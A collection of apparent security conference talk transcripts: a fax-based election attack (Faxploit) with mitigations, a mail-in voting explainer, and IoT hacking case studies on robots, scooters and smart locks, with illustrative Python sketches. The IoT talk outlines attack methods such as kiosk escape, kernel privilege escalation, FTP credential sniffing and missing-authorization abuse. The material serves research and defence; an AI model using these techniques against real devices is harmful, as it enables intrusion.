our own research and talked to other counties and cities.
So we'll move to the next slide, and what Check Point Research really showed us was that it was possible to exploit a printer-fax just with a publicly available fax number. For every city or county I looked at, the fax number was available; I could find it for the city clerk or the county clerk every single time, and that's where you'd be submitting your vote if you are one of these UOCAVA voters. So using that phone number, Check Point Research was able to hack the printer-fax, and actually they were also able to get to the network behind that printer-fax if it was on a flat network topology with no segmentation. So we'll talk about how they did that really fast. They discovered that in the T.30 protocol, you have access to both data and headers, and this enabled them to have full control of the JPEG file; that's why they used JPEG over any other file type. And over the PSTN, the public switched telephone network, they were able to get to that printer-fax and attack the proprietary JPEG parser. They looked at HP, but this is probably going to be the case for any of the big solutions, whether that's HP or someone else; they're probably implementing their own JPEG parser rather than using some sort of open-source, publicly vetted one. So since HP did that themselves, Check Point found a lot of CVEs, and they found a buffer overflow when parsing JPEG markers. And with that, they had a controllable stack-based overflow; they could do anything with it, and they were able to get a great exploit, which they paired with EternalBlue to spread to the rest of the network. So it was a really great demonstration at DEF CON 26. What could you do with this? Practically everything. You have confidentiality attacks, integrity attacks, and availability attacks; you have the full CIA triad.
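To make the bug class concrete, here is a toy sketch, not HP's code and not Check Point's actual exploit: a parser that trusts an attacker-controlled length field when copying into a fixed-size buffer. The segment layout, buffer size, and function names are all invented for illustration. In C, the unchecked copy is what smashes the stack; in this Python sketch we just show the copy exceeding the "buffer" and how the patched check rejects it.

```python
import struct

BUF_SIZE = 64  # the fixed "stack buffer" the parser copies into (hypothetical)

def parse_segment_unsafe(data: bytes) -> bytes:
    """Naive parser: trusts the attacker-controlled length field.
    In C, copying this payload into a 64-byte buffer would smash the stack;
    here we just return a payload that is far larger than BUF_SIZE."""
    marker, length = struct.unpack_from(">BH", data, 0)  # 1-byte marker, 2-byte length
    return data[3:3 + length]

def parse_segment_safe(data: bytes) -> bytes:
    """Patched parser: validates the length field before copying."""
    marker, length = struct.unpack_from(">BH", data, 0)
    if length > BUF_SIZE:
        raise ValueError(f"rejected segment: declared length {length} > {BUF_SIZE}")
    return data[3:3 + length]

# A crafted "fax page" segment: marker 0xC4, declared length 0xFFFF, oversized payload.
crafted = struct.pack(">BH", 0xC4, 0xFFFF) + b"A" * 0xFFFF

print(len(parse_segment_unsafe(crafted)))  # 65535 bytes headed for a 64-byte buffer
try:
    parse_segment_safe(crafted)
except ValueError as e:
    print(e)
```

The fix Check Point's disclosure prompted is essentially the second function's bounds check: never let a wire-supplied length drive a copy into a fixed-size buffer.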
You're seeing voter registration info, particularly if you're getting through to the network behind these printer-faxes; you're seeing ballots, hopefully not, but potentially; and you are able to maybe change those ballots. That's something that we're going to look at in the future: if we can get into one of these printer-faxes, can we get to those ballots, or can we get the incoming ballots and change them before they're stored? You also have availability attacks; you're potentially able to bring down an entire city or county's infrastructure for receiving votes for that election, which would make a recount necessary and make a lot of bad things happen that we obviously don't want to be seeing. Now, we did some confidential research with different cities and counties, and we have to keep that confidential, we're under NDA, but we can generalize; we can say what rough takeaways we're seeing from two main types of cities. First off, we have City A. This is your medium to large size city; they probably have good infrastructure investment in IT, they're probably able to actually hire talented professionals who are security conscious, and they're able to enforce strict adherence to best practices as regards security. These are all great things, and you're probably going to see a pretty secure fax implementation, which we did see when we were looking at these types of cities. City B, however, is the city that we talk about pretty much every time DEF CON rolls around with the Voting Village, the ones still running the DREs that we have shown vulnerabilities in every year. You know, it's obviously an outdated system that they're still using, but they're not going to spend the money to fix it, and they're not going to spend any money to become security conscious; so probably a really poor, mismanaged IT department, and they probably don't have good patching policies or a great security posture.
So looking at City A more in depth, the thing that makes them stand apart from other cities is that they use segmented networks. This keeps their printer-faxes separate from their data servers, which keeps them separate from their employee workstations, and it's even segmented at a very in-depth level, down to every fire station and police station. Those three things, the data servers, the workstations, and the print servers, would all be on different segments at every single location, so it's an extremely segmented network that keeps you from getting access through that one printer-fax. So basically, City A knows that the printer-fax is a potential point of intrusion. They probably have good patching policies for the printers. Hopefully they have multi-factor authentication in general and also for the fax servers, and they're probably using Fax over IP rather than the PSTN, so T.38 over T.30. City B, however, doesn't have any of these things. They've got a flat network topology: you exploit the printer-fax, you exploit the network. And they have bad patching, bad multi-factor authentication implementation, and bad security posture. So, if you're a City B, you're thinking, well, does this apply to me, how can I know? Well, what our high-level attack overview is specifically geared towards is what Check Point Research did, and what they showed it on specifically is the HP OfficeJet Pro 6830 all-in-one printer. However, it wasn't the printer that had the vulnerability; it was HP's implementation of the JPEG parser, remember. So HP released a security bulletin in 2018 talking about this and providing patches. Maybe City B saw that and applied the patch, maybe they didn't even think to apply the patch, or maybe they're not even keeping track of the lifecycle of their machines. These things are not important to lots of cities, and they're not going to look at security patches when they're available for them.
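The City A versus City B difference above can be sketched as an allow-list policy over network segments. The segment names and rules below are hypothetical, not any real city's configuration; the point is only that on a segmented topology a compromised printer-fax has exactly one permitted hop, while on a flat topology it can reach everything.

```python
# Toy model of City A's segmented topology versus City B's flat network.
# Segment names and rules are hypothetical.
SEGMENTED_POLICY = {
    "printer_fax": {"fax_server"},                  # fax gear reaches only the fax server
    "workstations": {"fax_server", "data_servers"},
    "fax_server": {"data_servers"},                 # one controlled hop inward
}

ALL_SEGMENTS = ("printer_fax", "workstations", "fax_server", "data_servers")

# City B's flat network: every segment can reach every other segment.
FLAT_POLICY = {src: set(ALL_SEGMENTS) for src in ALL_SEGMENTS}

def is_allowed(policy, src, dst):
    """Return True if the policy permits traffic from segment src to segment dst."""
    return dst in policy.get(src, set())

# A compromised printer-fax cannot pivot straight to voter data on City A's network...
print(is_allowed(SEGMENTED_POLICY, "printer_fax", "data_servers"))  # False
# ...but it can on City B's flat network.
print(is_allowed(FLAT_POLICY, "printer_fax", "data_servers"))       # True
```

In practice this policy lives in VLAN ACLs or firewall rules rather than code, but the deny-by-default shape is the same.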
And if you're a City B looking to see if you have an issue: did you buy the printer after 2018? Did you apply the patch if you bought it before 2018? If you didn't, and you're still using it, you're probably susceptible to attack right now. And there are other things to say about this as well. The guidance says that there's no widely used standard for fax encryption: information sent by fax is at risk of possible interception or modification, and jurisdictions should carefully weigh the risks of fax transmission against other alternatives. So this is a big deal, and I think this is one of the biggest vulnerabilities that we're seeing in fax, and the thing that we'd like to see change the most in the future is the lack of encryption; we would like to see a default encryption method used for fax in the future. Making encryption standard rather than optional would probably be a great step in that direction. They also stress secure locations for fax machines, because often with T.30, voter records or registrations might actually still be stored on the machine as they come through, unbeknownst to the user. So physical access would allow access to all of those. T.30 versus T.38, we'll go over that quickly if we haven't gone over it enough already. Over the PSTN, that's going to be T.30; it's unencrypted, and it's not real time. T.38 is the future that we're currently living in, but we also need to see a future with encryption implementations. We saw one company, babyTEL, and they have an AES-based solution. It's very useful for companies that are regulated and mandated to use secure networks along the way towards delivery to the user. However, this AES implementation by babyTEL isn't ensuring that you will have encrypted transport all the way across. So more stuff like that is what we need to see at a default level in the industry, and we're not seeing it right now, which is why we're talking about it and getting it on the record.
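Since there is no standard fax encryption, even the integrity half of the problem goes unaddressed: a ballot image modified in transit is indistinguishable from the original. The sketch below is purely illustrative, not any real fax product's scheme; it assumes a pre-shared key between clerk and voter (a big assumption) and shows only tamper detection via an HMAC tag, not confidentiality.

```python
import hmac, hashlib, os

TAG_LEN = 32  # HMAC-SHA256 digest length

def tag_document(key: bytes, document: bytes) -> bytes:
    """Append an HMAC-SHA256 tag so the receiver can detect tampering.
    Integrity only: this does not hide the document's contents."""
    return document + hmac.new(key, document, hashlib.sha256).digest()

def verify_document(key: bytes, tagged: bytes) -> bytes:
    """Return the document if the tag checks out, else raise ValueError."""
    document, tag = tagged[:-TAG_LEN], tagged[-TAG_LEN:]
    expected = hmac.new(key, document, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time compare
        raise ValueError("tag mismatch: document was modified in transit")
    return document

key = os.urandom(32)                       # pre-shared key (hypothetical setup)
ballot = b"%PDF-1.4 ... marked ballot ..."
tagged = tag_document(key, ballot)

print(verify_document(key, tagged) == ballot)   # intact transmission verifies
tampered = tagged[:10] + b"X" + tagged[11:]     # flip one byte mid-transit
try:
    verify_document(key, tampered)
except ValueError as e:
    print(e)
```

A real fix would also need confidentiality (encryption of the page data) and a sane key-distribution story, which is exactly what the fax ecosystem lacks by default.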
So the big issue, the kind of pushback we faced from different cities and counties, was that they say maybe the last fax their city received was back in 2012, eight years ago, so they don't think about it at all; it doesn't cross their minds since they don't see it on a daily basis, and they ask themselves, why do we need to secure this? It doesn't seem like a security risk. But the point is that a ballot doesn't have to be cast by fax for it to be a security risk. The fact of the matter is that having your city or county clerk's fax number publicly available online, and malicious actors knowing that that's the phone number they need to get access to whatever's on that printer or printer-fax: that's all they need. And if you are not patched, if you're on a potentially vulnerable solution, that's it, you're done. That printer-fax is done, and you potentially open yourself up to integrity attacks, and at the very least confidentiality and availability attacks, if you have a bad network solution. So we heard a lot of that perspective, but we definitely need to acknowledge that the root of the matter is having a publicly available phone number. So with the security gap analysis, we're moving towards a future state. What do we want to see? Well, like we talked about, we want to see encryption, and we want to maybe even see fax no longer being a needed method for transmission. Many industries are stuck with it; fax is something like 70% of all medical transmissions. But maybe elections doesn't have to be one of those industries where fax is the reality. So what are we going to do in the future as we continue to work on this with Secure the Vote? Well, we want to reconstruct the Faxploit exploit, but we also want to demonstrate it with the T.38 fax protocol and Fax over IP, because of a lot of what we're seeing from cities and counties.
They do do fax sometimes, but it's all electronic, and sometimes, for the City B or County B scenarios, IP just means security to them; over the internet means secure. Maybe they have some sort of bias against phone lines, and that's not the case. We want to demonstrate these exploits to various election officials around the country and show that fax isn't secure and needs to be changed, or that we need to make sure there are defenses in place to secure our votes and to secure democracy. So we're going to continue to raise awareness about fax security. And what are we going to do now? Well, for one thing, COVID-19 has made this a very interesting age, and it could potentially drop voter turnout as people cannot come out to physical voting locations, and maybe jurisdictions will look at things traditionally offered to UOCAVA voters and offer them to the general public: so fax, web portals, and mobile voting. And we need to be very conscious when we look at opening fax up to the general public, because that is adding a huge attack surface. That's adding, you know, millions more votes that could potentially be cast by fax; even though we probably won't see millions of votes cast by fax, the potential is the point. That's potentially millions of votes that could be changed or maliciously attacked, and that's a huge target for nation states that may be looking to influence the election. So we need to keep that in mind as we potentially add fax for more people. And if it does get added, we need to look at it in a very security-minded way, and as an emergency ballot return method, not as something that everybody should default to.
So election offices should probably perform a security audit on their fax machines to make sure, you know, exactly what we've been talking about: were these HP printers bought after 2018, and do they have the security patch applied, all that stuff. Because if not, that's the first step of triage, first fixing the situation. So, short-term recommendations. If you're in a position of power, you need to talk to your IT department about these things that we've been talking about. Specifically: do you have good security posture, like multi-factor authentication? Do you have a strong network architecture across your IT department? And for your printer-faxes, do you have a segmented network topology that will help you defend against these confidentiality and availability attacks that we've been talking about, and even the integrity attacks, and that will keep a compromised fax from exploiting the rest of your election network? Do you have a patching policy? Are you even security conscious about the networked machines that you have in your office? And if you don't have these things, or you don't know, I would definitely recommend talking to your IT department about this and trying to secure your network by this fall. And in the further future, we need to talk about how T.38 Fax over IP using an encrypted solution should be the standard default in whatever anyone is using, especially in the elections context. We also need good fax hygiene for everyone, so we're not storing voter records on these fax machines, especially unbeknownst to the users. And T.30 having an encryption protocol would also be great, because a lot of people are still going to be stuck on legacy systems for various reasons, and so encryption for that would be great as well. The medical industry has actually had a bit of a commitment to reduce or eliminate fax entirely by about 2020 from one of the main drivers of fax policy for medical companies.
It hasn't happened yet, you know, it's been a crazy time, but they're definitely looking at reducing fax. So can we maybe eventually follow the medical industry? It's a great question as we look at the future. So what's the point of all this? With all of 2020's craziness leading up to the end of the year, and everything that's happened, this election is going to be of paramount importance, obviously, so we cannot let this opportunity to further secure America's democracy go unspoken. That's what we're about here in the Voting Village: showing exploits, showing vulnerabilities, and saying we are not securing democracy properly if we really care. And that's one of those things: even though it's a few ballots, it's a few ballots, and those few ballots matter. So at the same time, can we leverage you all? If you have a fax machine, if you're interested, if you want to keep following us, how about you hack your fax machine, post about it with the hashtag hack-a-fax, and we'll be able to see that and keep showing it to officials as we go around the country for the next few years, with security in mind, though. So that's what we have. We're from the National Cybersecurity Center, and that's Hack-a-Fax. Thanks, guys.
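The short-term checklist from the talk (multi-factor authentication, a segmented network for printers and fax machines, and a patching policy) could be checked with a small audit script. This is only an illustrative sketch; the inventory format and field names are invented for the example, not taken from any real election-office tooling.

```python
# Toy audit sketch for the short-term checklist above: MFA, a segmented
# network for printers/fax machines, and patching. The inventory format
# and field names here are invented for illustration.

REQUIRED_CONTROLS = ("mfa_enabled", "segmented_vlan", "patched")

def audit_device(device: dict) -> list:
    """Return the list of controls this device is missing."""
    return [c for c in REQUIRED_CONTROLS if not device.get(c, False)]

def audit_inventory(devices: list) -> dict:
    """Map each non-compliant device name to its missing controls."""
    findings = {}
    for device in devices:
        missing = audit_device(device)
        if missing:
            findings[device["name"]] = missing
    return findings

inventory = [
    {"name": "fax-printer-01", "mfa_enabled": False,
     "segmented_vlan": False, "patched": True},
    {"name": "epollbook-02", "mfa_enabled": True,
     "segmented_vlan": True, "patched": True},
]

print(audit_inventory(inventory))
```

Even a trivial report like this gives an IT department a concrete list to work through before the fall.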
Millions of overseas voters must choose between the following ballot return methods: international mail, email or fax return as allowed by each respective state law. The insecurity of email and fax, arguably, creates a security gap in the overall elections infrastructure that undermines its integrity. The National Cybersecurity Center proposes to ‘hack a fax’ in order to demonstrate the lack of security, and create an opportunity to strengthen standards. The concern to the broader community is that as we continue to seek to make voting more accessible, it must also be secure. Policies that limit overseas voters to technology that may not have security standards in place, and therefore are insecure, reduce the integrity of the overall elections ecosystem.
10.5446/50770 (DOI)
Don't go postal over mail-in voting. A look into voting by mail with yours truly, BiaSciLab. First of all, who am I? I am a 13 year old girl and two years ago I was the youngest speaker at Hope and a lot has happened since then. I spoke three times at DEF CON. I spoke in the r00tz Asylum, the Biohacking Village and the Voting Village. I also gave a talk on election security in Romania at DefCamp, spreading the word about election security worldwide. My election hacking from the r00tz Asylum was highlighted at a congressional hearing on election security and I am the founder and CEO of Girls Who Hack. Our motto is teaching girls the skills of hacking so that they can change the future. I provide online and physical lessons to any girl who wants to start her journey in cyber security. Speaking of my startups, I also started Secure Open Vote. I am building my own end-to-end election system. This year at DEF CON I have my reporting system running in the Voting Village so you can try to change the vote count. So let's jump in. Due to COVID-19, this year's 2020 election is going to be one of the hardest in history. More people than ever are switching to mail-in voting instead of voting in person. To give you an idea of how many people voted in the 2016 elections by mail, 25% voted by mail. So let's clarify how voting by mail works, dispel some rumors, and go over the pros and cons. Starting with a quote from a high-level politician: there is no way, zero, that mail-in ballots will be anything less than substantially fraudulent. Mail boxes will be robbed, ballots will be forged, and even illegally printed out and fraudulently signed. Whoa, there is a lot to unpack there. First of all, he said that mail boxes will be robbed. This is a federal crime punishable by up to five years in jail and a quarter of a million dollars in fines. Stealing mail from someone's house to get their ballot would be difficult.
You would have to know when the ballot was mailed out, and everyone is home these days anyway. The postal mailboxes are emptied daily. So, unless you are going to go out in broad daylight, pick the lock to a mailbox and steal a bunch of mail-in ballots, pretty sure mail boxes are safe. If you did manage to get away with it, it is likely that the few ballots that you got will not tip the election. In May 2020, a big donor to the Trump campaign was appointed as Postmaster General. Since then, people have noticed that the mail has slowed significantly. Mail and packages have been returned. He has shut down the mail sorting machines, forcing mail to be sorted by hand, taking the postal service back to the 1950s. Even one of my Girls Who Hack soldering kits has come back to me. See? Anyway, the good news is you can always drop off your ballot in a ballot drop-off box. In fact, over 65% of all mail-in ballots are cast this way. With everything going on in the mail system, your best bet is to drop your vote off at a ballot drop-off box or in person. But someone can just steal the entire ballot box! Not likely. Ballot boxes are kept at secure locations such as police stations or municipal buildings. The boxes are emptied daily and have security cameras on them. Additional security features such as unique keyed locks or tamper-evident seals are also used. I know what you're thinking: but Bia, in your other election talk, you said tamper-evident seals can be undetectably opened and manipulated. Okay, you do that. Go to the police station with your lockpicks and your acetone and open the ballot box. Let me know how that works out for you. The penalty for mail ballot fraud is up to five years in prison and $10,000 in fines for each act of fraud. That is in addition to state penalties. If the postal system and the ballot boxes still scare you, you can always drop your ballot off by hand at the county clerk's or election board office.
You may be saying that people are just going to print out their own ballots, but the ballots themselves are very difficult to forge. They use many security features, including special papers with UV sensitive markings and watermarks. You can't just run to Staples and buy this stuff. If you have ever held a piece of fake money, you know how it feels different than the real thing. When the election officials are opening the ballots, the one that Bob printed out on his inkjet at home will definitely stick out. Some ballots use color shift ink or magnetic printing ink. This ink is extremely difficult to source and is delivered by armored truck. It's also worth noting that you need an actual printing press to use these inks. Bob won't just be loading that into his inkjet. Many ballots have micro printed unique security codes or barcodes. This prevents duplicates and allows voters to track their ballot as it travels through the system. Another thing that this high official said is that they will forge signatures, but the voter signature is verified against their past signatures. Some states provide extra training for their election workers to spot forgeries. If an inconsistency is found, it is reported to the state prosecutor's office. But you can vote twice, once by mail and once in person! That's a big cup of nope! Mail-in ballots are due before the election. This gives election officials time to check the voter off the roll as voted. If the voter goes and tries to vote in person, the state prosecutor's office is notified. Occasionally, people have received two ballots in the mail with their name on it. No, this does not mean you can vote twice. But how does this happen? Okay, how many of you have ever merged two databases? Well, the computer sees these two names as unique: Marge Bouvier, the name she used when she first registered to vote at age 18, and Marge Bouvier Simpson, the name she took after she got married to the handsome Homer Simpson and which is in the DMV system.
When the state merged the DMV database with the voter registration database, Marge showed up twice. The good news is, humans check these names and signatures on the ballot to catch these kinds of errors. If you ever receive two ballots, simply call the election office and they can correct the error. Now that we've debunked some myths, let's talk about how voting by mail works. Every state is in charge of its own elections, so it differs slightly from state to state. Some states allow you to vote by mail without a specific reason. Others require a valid reason to vote by mail. A few do not consider COVID to be a valid reason, but this is changing day by day, so check vote.org to see what your state is doing. The first step is to register to vote. 39 states and the District of Columbia allow their citizens to register online. Every state has a printable registration form, so you can print it out and either mail it in or deliver it in person. Make sure that you register by the deadline. If it is getting close, bring that registration form to the clerk's office or election office in person. If you have not registered to vote, do it after this talk. I'm serious. It takes only two minutes, literally two minutes, and it's very important because every vote counts. I made this really big so you can take a screenshot: go to register.vote.org to register. Vote.org has tons of great voter resources, including checking if you are registered, how to get a mail-in ballot, a polling place locator and election reminders. Next, make sure you're eligible to vote by mail. Currently, five states have an all mail-in ballot election. 28 states and the District of Columbia have no excuse absentee voting, which means you can just vote by mail without having to give a specific reason. In 17 states, you need a valid reason. This differs from state to state. Some reasons include old age, being infirm or out of state.
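The database-merge mix-up behind Marge's two ballots can be sketched in a few lines of Python. This is purely illustrative: the records, field names and matching rule are invented, and real voter-roll matching is far more involved, which is exactly why humans review these cases.

```python
# Illustrative sketch of the duplicate-voter problem: merging two
# databases on the exact name string treats "Marge Bouvier" and
# "Marge Bouvier Simpson" as two different voters. Records and field
# names are made up for the example.

dmv_records = [{"name": "Marge Bouvier Simpson", "dob": "1956-10-01"}]
voter_rolls = [{"name": "Marge Bouvier", "dob": "1956-10-01"}]

def naive_merge(a, b):
    """Union keyed on the exact name string -- produces duplicates."""
    merged = {r["name"]: r for r in a}
    for r in b:
        merged.setdefault(r["name"], r)
    return list(merged.values())

def merge_with_review(a, b):
    """Key on date of birth plus first name instead, and flag name
    collisions for the human review step the talk mentions."""
    merged, review = {}, []
    for r in a + b:
        key = (r["dob"], r["name"].split()[0])
        if key in merged and merged[key]["name"] != r["name"]:
            review.append((merged[key]["name"], r["name"]))
        else:
            merged[key] = r
    return list(merged.values()), review

print(len(naive_merge(dmv_records, voter_rolls)))  # two records, one person
merged, review = merge_with_review(dmv_records, voter_rolls)
print(len(merged), review)
```

The second function still is not real record linkage; its point is that flagging ambiguous matches for a human, rather than silently keeping both rows, is what catches the Marge case.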
To see if you are eligible to vote by mail, go to vote.org for your state and see if you are eligible. Here is a map and again, things are constantly changing, so check online at vote.org to see where your state fits in. Next, you have to request an absentee ballot. If you have not done this, do it now. After my talk, go and request your absentee ballot. This will give them time to add you to the list and mail out your ballot. Guess what? You can do this at vote.org. When you finally receive your ballot, sit down and fill it out. Right away. Don't put it in a pile of bills and junk mail you are ignoring. Sit down and just fill it out. One of the great things with mail-in ballots is you can research the candidates. Get your OSINT on and find out what each candidate is all about. Who knows? Perhaps that school board member actually owns a chocolate factory. COVID is a valid reason for many to vote by mail and should be considered valid by all states. If a voter is immunocompromised, or lives with someone who is, not allowing them to vote by mail is a form of voter suppression. Voting in person also brings the risk of COVID to the election workers, many of whom are elderly retirees, putting their lives in danger just so you can vote in person. The poll workers also have to clean the machines between each vote, slowing the process and lengthening the poll lines. It also forces people to go to extremes to protect themselves. This lady had to wear a trash bag. Now that's one fashion statement that should never be made. In many states, processing of mail-in ballots can begin as soon as they are received. Other states do this anywhere from one month before to the day of the election. By permitting election officials to do a lot of the work ahead of time, the counting process on election day will be quicker. It's important to note that if ballots are counted ahead of time, the results are not released before election day.
Regardless of how they are counted, this is a great opportunity to perform a risk-limiting audit. And every state should do this. You have everything you need: hand-marked paper ballots and people to count them. But mail-in voting has tons of fraud! Between 2000 and 2014, over a billion mail-in ballots were cast, and a professor at Loyola Law School found only 31 cases of fraud. There are many benefits to mail-in voting. Voter turnout is 10% higher, and it does not seem to favor one party or another. It reduces some voter suppression, like poll intimidation, or people who have to travel a great distance to vote and have no transportation. Or people who have to work on election day, which should be a national holiday by the way. It also protects from attacks by foreign actors. Kind of hard to hack a piece of paper, isn't it, Putin? One of the biggest benefits is it speeds up the election process. No long lines at polls or people not being able to vote because of crashing e-poll books or slow election machines. The two most important things are it's a hand-marked paper ballot and it allows for better informed voting. No more just randomly picking school board members. Remember this guy? The high ranking government official from earlier voted by mail in 2017, 18 and 20. I guess this system is good enough for him. So why shouldn't it be good enough for us? And remember, get involved, become a poll worker. See how the system works first hand and give those older retirees a break, especially during COVID. You can actually save a life by becoming a poll worker. Don't want to go outside and see people? I don't blame you. Not a problem. You can lend your cyber security knowledge and skills to those who need it most by becoming a cyber surge volunteer. This can be done remotely. You can do this by contacting this email or going to this site. The most important thing you can do is vote. Register to vote at vote.org and be counted. Thank you for listening to my talk.
And don't forget to vote BiaSciLab for president in 2044. This message paid for by BiaSciLab for President 2044.
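On the risk-limiting audit point from the talk: one reason hand-marked paper ballots make audits practical is that the number of ballots you need to sample depends mostly on the victory margin, not on how many ballots were cast. The sketch below uses a common rough approximation for a two-candidate ballot-polling audit's expected sample size, about 2·ln(1/risk limit)/margin²; this is a simplification for illustration, not the full BRAVO procedure auditors actually run.

```python
import math

# Rough rule of thumb for a two-candidate ballot-polling risk-limiting
# audit: expected sample size is about 2 * ln(1 / risk_limit) / margin**2.
# A simplification for illustration, not the full BRAVO procedure.

def approx_sample_size(margin: float, risk_limit: float) -> int:
    """Approximate number of ballots to sample by hand."""
    return math.ceil(2 * math.log(1 / risk_limit) / margin ** 2)

# A 10-point margin at a 10% risk limit needs only a few hundred ballots,
# even for an election with millions of votes cast:
print(approx_sample_size(0.10, 0.10))
# A razor-thin 1-point margin needs tens of thousands:
print(approx_sample_size(0.01, 0.10))
```

The takeaway matches the talk: with hand-marked paper ballots already in hand, a statistically meaningful audit is usually a matter of recounting hundreds of ballots, not millions.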
As the previous DEF CON Voting Villages have proved, our voting equipment and infrastructure are very vulnerable to multiple types of attacks. But now, with everything that's going on in the world, voting by mail is the new vulnerable thing! Instead of focusing on problems and broken things, this talk will focus on simple fixes that vendors and governments can put into action right now. Starting with registering to vote, then moving through parts of the entire system, BiaSciLab will offer suggestions on how simple practices and changes in thinking can improve the security of the entire system. Last year in the Voting Village, BiaSciLab did a talk on the election system's problems and how to fix them. This year, with voting by mail, new problems are appearing! Like states not allowing people to vote by mail! Breaking down these flaws and offering real solutions for each one, BiaSciLab will bring hope in the face of this daunting and complex security problem in these hard times.
10.5446/50720 (DOI)
Hi everyone, in this presentation we will tell you about our experiences with IoT hacking. I will also mention the weaknesses and misconfigurations that we have identified and that can be detected. But firstly I want to talk about myself. When I look at myself in general, there are a few keywords I can use about me. These are co-founder, author, speaker and trainer. Apart from this, there is not much I can say for myself, and I can say I love Wi-Fi hacking. This slide also contains some information about my friends. Since we cannot make the presentation live and we are in different locations, I am the only one giving the presentation right now. Let's start, guys. In IoT hacking research, there is something that everyone is curious about. How should IoT devices be analyzed? What is the methodology? What tools should I use in IoT hacking or research? Many, many questions like: how can I find weaknesses in IoT devices? In order to answer these questions, we should be able to look deeply, to understand everything correctly. In this context, the first step is to choose the product to be analyzed. In order to do this, we should ask ourselves the following questions. Which industry am I targeting? Which area of that industry do I target? For example, your target in the financial sector may be a product used in banks. Your target in the health sector may be products used in patient rooms of hospitals. If you ask yourself these questions and write down the answers, you will have defined your goal. After defining the target, the product must be obtained. There are several options for this. You can contact the manufacturer of the target product. You can contact a customer using the target product. You can buy the target product. By using one of these methods, you can work with the manufacturer, the developer or the customer to improve security. This is the most important step, because now your target industry and target area are certain and you have obtained the product.
To model the attack surface correctly, we should know that every product has many properties associated with it. Note that these features associated with the product can actually be used as attack points against the product. For this reason, you need to take a piece of paper in your hand and write down the features associated with the product. You can try it yourself to understand attack surface mapping. Once you have correctly defined the attack points, you will need the necessary hardware and software to perform the associated attacks. The resource you see in the presentation will be very helpful for this; you can find a lot of hardware and software in it. Finally, after all of that, you can start exploiting the product. In this presentation, I would like to share the details of three stories and four products. The first is a robotic assistant. I can say about this target that it is a robot system, and it has target features such as Wi-Fi connection, internet connection, USB inputs and others. This target product is used in hospitals, restaurants, airports and other possible areas. On this product, we found weaknesses such as privilege escalation, a hidden admin panel, a weak password, insecure communication and a login bypass. Let's take a closer look at them to understand deeply. The first is the login bypass on this target. Usually on the main screen there are processes related to the service of the device. But remember, there was a keyboard input. When you press a specific key combination on a keyboard attached here, you can bypass the service screen and access the terminal directly. After accessing the terminal with the previous weakness, we gathered information about the device with the uname command. Then we saw that there was a kernel weakness, and we escalated our privileges on the system with an exploit we downloaded from Exploit-DB. Another finding is the hidden admin panel in this product.
Clicking on a particular area of the screen multiple times opens this secret panel. If it is also protected by a weak password, you can directly access it with admin authority. And yes, we did it. As my authority increased on the product, I started to try different things. In one analysis, I saw that the product performed firmware and other software updates over insecure protocols like FTP. And you know FTP is an insecure protocol: an attacker in the same environment can sniff the traffic and see the username, password and other information. After all of that, I took control of the robots by capturing the credentials of the server where the robots were updated. This is now a zombie robot network; we can do anything on the robots and we can control them. The second story is about the smart scooter. I can say about this product that it is usually used for transportation purposes. It has features that can be targeted, such as a smart lock, a mobile application, the developer, and others we will talk about. This smart scooter is generally used for short distance transportation, like on a university campus, you know. And I also saw some people use it to carry household items in Turkey. When we look at this product, we found that there are basically four different attack points. The most important of these attack points is of course the human factor, and it is ignored in most research. Then there is the mobile application. There are many functions that can be used as an attack vector in this mobile app, and in general every electric and smart scooter has the same functions, like reserve: you can reserve your scooter, you can start the ringing function, and you can log in, register, you know. The mobile application could be an APK file or an IPA file. And this is the ringing function; at the same time it lights up the device constantly, so people around you understand that someone has found it first.
In our study, we have seen that this function can be triggered without authorization, using only the QR code number on the device. We can watch this video. We captured the mobile application traffic for the ringing function, and when we deleted the authorization header from the request, we saw we could repeat this function every time; there was no rate limit and nothing securing it. And when I analyzed the mobile apps for two different products of the manufacturer, I saw that they use the same AES key value hard-coded, as you see on the presentation screen. Another weak point is again within the mobile application: hosting hard-coded information in a mobile application is a common problem. Here I saw that the secret password information was left statically in the mobile application. When you analyze any mobile application related to a smart scooter, you can find this same bug. In mobile application penetration testing related to smart hardware, you should check static information; you can find a lot of hard-coded information like super passwords and AES key values. The main weakness here is the human and the devices that he uses. Therefore, we can expand the attack surface by asking the following questions about the developer: Is their computer connected to any Wi-Fi? Is any USB connected? Do they open every email and download or run any file? Is the operating system updated? Is the developer's mobile phone jailbroken or rooted? After these questions, we can launch a social engineering attack or hack the wireless network the person is using. In our research, we saw that there is a weakness here: the developers are very careless. And this is the smart lock the user locks the smart electric scooter with. It usually has a QR code on it and has Bluetooth Low Energy communication. It also communicates with the mobile application. The most dangerous point here is the QR code, which does not directly harm the smart scooter vehicle, but we have seen that it is an attack point against users indirectly. Think like that.
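The static check described above (searching a decompiled app's strings for embedded credentials) can be sketched like this. The regex, the function name and the sample strings are invented for illustration; real scanners also use entropy analysis and known-key fingerprints.

```python
import re

# Toy version of the static check described above: scan strings pulled
# from a decompiled mobile app for likely hard-coded credentials. The
# pattern and the sample strings are invented for illustration.

SUSPICIOUS = re.compile(
    r"(?i)(password|passwd|secret|api[_-]?key|aes[_-]?key)\s*[:=]\s*[\"']?([^\s\"']+)"
)

def find_hardcoded_secrets(strings):
    """Return (keyword, value) pairs that look like embedded secrets."""
    hits = []
    for s in strings:
        match = SUSPICIOUS.search(s)
        if match:
            hits.append((match.group(1).lower(), match.group(2)))
    return hits

app_strings = [
    'super_password = "Sc00ter!"',
    "aes_key: 0123456789abcdef",
    "ringScooter(qrCode)",
]
print(find_hardcoded_secrets(app_strings))
```

A grep-level pass like this is often enough to find the kind of super password and shared AES key the talk describes.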
You can try to install malware on the phone with a fake QR code, or redirect users to a phishing page with a fake QR code on the smart scooter. And this is the story about the fifth target, a smart lock; we will tell you about it quickly. I can say about this target, the smart lock, that it has attack points such as the mobile application, network services, internet connection, Bluetooth Low Energy communication, firmware and hardware. All of them are attack vectors for our research. This smart lock could be used in a hospital, at home, on a smart scooter and, you know, in other places. There are a lot of weaknesses here in the smart lock. Especially if you are using a cloud-based device on your home wireless network, you will lose communication with your smart device under a Wi-Fi DoS attack. Another point is the broken authorization in the mobile application, so an attacker can control your locks. This weakness of the product is related to the web service that the mobile application communicates with. As you can see, there are many related points. In one lock's API, the bind and unbind functions are vulnerable to broken authentication: an attacker can use the bind and unbind functions without any security restriction. Finally, we have seen that other users' profile information can be updated without authorization in the other lock's API. And thanks a lot to Rutschall Labs for their support. Thank you for listening to us.
